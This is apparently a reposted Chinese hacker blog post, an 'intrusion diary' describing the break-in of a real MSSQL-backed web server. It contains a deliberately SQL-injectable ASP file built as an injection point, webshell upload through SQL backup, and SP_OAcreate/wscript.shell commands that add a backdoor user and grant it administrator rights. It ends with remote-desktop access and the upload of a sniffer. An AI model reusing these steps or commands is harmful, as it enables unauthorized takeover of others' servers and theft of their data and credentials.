打開SQL用查詢分析器連上，發(fā)現(xiàn)了幾個(gè)數(shù)據(jù)庫(kù)估計(jì)是服務(wù)器的幾個(gè)網(wǎng)站共用的這一個(gè)SQL server 于是立刻本地構(gòu)造一個(gè)注射點(diǎn)，準(zhǔn)備列目錄。 構(gòu)造注射點(diǎn)代碼如下:
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=212.175.236.XXXX;UID=aXXXXX;pwd=XXXX;DATABASE=XXXX"
%>
★

我隱藏掉了真實(shí)的用戶跟密碼。。這里我說(shuō)下怎么利用這個(gè)MSSQL的用戶名和密碼。首先我們構(gòu)造一個(gè)有注射漏洞的文件sql.asp，代碼如下：

★
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from PE_GuestBook where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>

★

這里我們可以看到，直接用request("id") 取值沒(méi)有過(guò)濾就構(gòu)成了注入漏洞。我們?cè)谧钋懊婕由?，就是這個(gè)文件包含了conn.asp，把這兩個(gè)文件放在同一目錄下。這里我在本機(jī)架設(shè)放在WEB目錄下，用啊D檢測(cè)一下，地址為http://127.0.0.1/sql.asp?id=1。因?yàn)閟ql.asp明顯有注射漏洞，再包含conn.asp，所以一檢測(cè)1就有注射點(diǎn)了，如圖1



PS:如果看過(guò)我以前文章的朋友肯定會(huì)覺(jué)的熟悉吧 ，因?yàn)檫@招我已經(jīng)用過(guò)了，呵呵這里再寫一次一個(gè)是為了自己復(fù)習(xí)下，一個(gè)也是為了給不會(huì)的朋友再說(shuō)下。

既然是DB權(quán)限我們最常用的就是列目錄然后備份獲得WEBSHELL了吧？嘿嘿。找了半天終于在D:\Inetpub\sevi發(fā)現(xiàn)了網(wǎng)站的根目錄，為了防止出錯(cuò)我還多試了幾遍，確定是WEB目錄后馬上使用SQL備份之..這里語(yǔ)句我就不寫了，上次滲透黑客風(fēng)云的文章里寫了很大的篇幅，不懂的朋友可以自己去看下，因?yàn)榕紓冎苯佑谜Z(yǔ)句備份，所以成功的備份個(gè)小馬上去 如圖2 3







傳上大馬之后發(fā)現(xiàn)服務(wù)器竟然不支持中文..看起來(lái)很不舒服。不過(guò)能瀏覽一些盤，看了下WEB目錄服務(wù)器上共有7。8個(gè)網(wǎng)站 都可以瀏覽，隨便看了個(gè)站發(fā)現(xiàn)了一個(gè)SQL密碼竟然跟我的是不一樣的，于是重新用SQL連上，發(fā)現(xiàn)這回竟然是SA權(quán)限 如圖4



但是在用xp_cmdshell存儲(chǔ)過(guò)程執(zhí)行命令的時(shí)候發(fā)現(xiàn)管理員把xplog70.dll給刪掉了，我日。

但是沒(méi)關(guān)系 偶們還有SP_OAcreate可以用 用SP_OAcreate一樣可以執(zhí)行系統(tǒng)命令

在查詢分析器里執(zhí)行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user godyhook hook /add'

就是利用SP_OAcreate來(lái)添加一個(gè)godyhook的系統(tǒng)用戶 然后直接提升為管理員權(quán)限就OK了

提示命令完成成功 說(shuō)明SP_OAcreate并沒(méi)有被刪除 如圖5



但是連上終端的時(shí)候卻提示我沒(méi)有進(jìn)入桌面的權(quán)限，著實(shí)郁悶了半天。后來(lái)好半天才想起來(lái)只是加了用戶 但是并沒(méi)有把

用戶提升到管理員組，暈 真是大意

馬上執(zhí)行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD

@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net localgroup administratos godyhook /add'

然后再連一下 發(fā)現(xiàn)成功進(jìn)入服務(wù)器鳥..看了下 網(wǎng)站有幾個(gè) 哈哈 如圖

然后上傳一個(gè)cain到服務(wù)器上 準(zhǔn)備開始偶們的sniffer 哈哈. 文章著實(shí)沒(méi)什么技術(shù)含量 也就是普通的入侵日記。 本來(lái)還有幾篇文章的因?yàn)殡s志的原因暫時(shí)不能發(fā)出來(lái) 嘿嘿

總結(jié)：對(duì)于拿到MSSQL帳號(hào)找WEB目錄，可以利用玫瑰滲透PCSHARE的方法，快速查找！

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。